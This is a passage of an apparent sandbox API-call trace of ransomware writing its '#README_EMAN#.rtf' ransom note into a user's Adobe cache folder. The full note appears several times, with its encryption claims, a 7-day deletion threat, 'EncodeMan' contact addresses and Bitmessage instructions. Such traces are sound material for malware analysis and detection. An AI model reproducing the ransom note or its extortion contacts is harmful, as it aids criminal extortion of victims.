lpUsedDefaultChar=0x0) returned 8717 [0271.405] WriteFile (in: hFile=0x2ec, lpBuffer=0x1ef7008*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x1ef7008*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0271.406] CloseHandle (hObject=0x2ec) returned 1 [0271.406] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Adobe\\AcroCef\\DC\\Acrobat\\Cache\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\adobe\\acrocef\\dc\\acrobat\\cache\\#readme_eman#.rtf")) returned 0xffffffff [0271.406] GetLastError () returned 0x2 [0271.406] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Adobe\\AcroCef\\DC\\Acrobat\\Cache\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\adobe\\acrocef\\dc\\acrobat\\cache\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2ec [0271.407] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0271.407] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0271.407] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x1ef7008, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n 